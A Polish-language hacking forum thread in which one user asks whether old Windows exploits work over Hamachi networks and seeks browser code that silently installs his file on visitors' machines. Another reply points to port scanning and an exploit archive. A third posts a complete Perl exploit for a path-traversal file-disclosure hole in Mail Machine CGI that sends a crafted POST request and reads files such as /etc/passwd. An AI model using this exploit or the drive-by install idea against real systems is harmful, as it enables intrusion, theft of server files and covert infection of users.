Hamachi exploit?

[w1277]

Witam

Mam pare pytan co do exploitow:
Czy exploity typu kaht, argoxp dzialaja w wirtualnych sieciach hamachi?
Jesli tak, to czy moglby mi ktos podac nazwy podobnych exploitow, idealnie linki do nich?

Edit: Probowalem kahta pod hamachi, wylaczylem firewalla i av ale nic sie nie dzialo:

Interesuje mnie jeszcze kod w IE, badz innej przegladarce, ktory instalowalby moj plik ze strony automatycznie. Szukalem na wielu forach, ale zaden z tych skryptow nie dzialal, nawet po zaakceptowaniu activex, nic sie nie dzialo.


Z gory dziekuje.

 

[KangurX]

kaht jest stary jak swiat i te dziury sa juz dawno zalatane, sie mi zdaje ze exploity nie dzialaja na hamachi to lepiej przeskanowac porty jakims skanerem portow Klik i poszukac odpowiedniego exploita ;]

tu szukaj exploitow www.milw0rm.com


Pozdro

 

[-=silkroad=-]

a co to ?

#!/usr/bin/perl -w

#__________________________________________________________________________

# [*] Mail Machine Local File Include Exploit
# [*] Vuln. v3.980, v3.985, v3.987, v3.988 and v3.989
# __________________________________________________________________________

# [!] Application homepage : http://www.mikesworld.net/mailmachine.shtml
# [!] Author : H4 / Team XPK
# [!] Contact : [email protected]

# ---------------------------------------------------------------------

# Vuln. code:

# In mailmachine.cgi sub load { ...

# open() function is not properly sanitized against user supplied input

# ---------------------------------------------------------------------

# [!] This information got leaked long time ago, therefore we think that
# everyone should have this information

# [!] Greetz to Angeldust & Narcotics and Streets and to rest of community.

use strict;
use IO::Socket;

if(@ARGV<1) { &Usage; exit(0); }

my $host = 'h4x0red.com';
my $port = 80;
my $path = '/cgi-bin/mail/mailmachine.cgi';
my $file = "$ARGV[0]";

sub Header()
{
print "*=====================================================================*n";
print " ----------------------------------------------------------------n";
print " Mail Machine File Disclosure Exploitn";
print " ----------------------------------------------------------------n";
print "*=====================================================================*n";
print " Coded by H4nn";
}

Header();

print "[*] Attacking $host ..nn";

my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => 'tcp' ) || die "[!] Unable to connect to $hostn";
my $post = "action=Load&archives=../../../../../../../../..$file%00";

my $send = "POST $path HTTP/1.1rn";
$send .= "Host: $hostrn";
$send .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4rn";
$send .= "Accept: text/htmlrn";
$send .= "Connection: Keep-Alivern";
$send .= "Content-type: application/x-www-form-urlencodedrn";
$send .= "Content-length: ".length($post)."rnrn";
$send .= "$postrnrn";

print $sock $send;

while ( my $line = <$sock> ) {
print "$line";
}

close($sock);

sub Usage()
{
Header();
print "Usage : mailmachine3.pl filenamen";
print "------> mailmachine3.pl /etc/passwdn";
print "Do not forget edit host/path/port..n";
}

# milw0rm.com [2007-07-10][/b]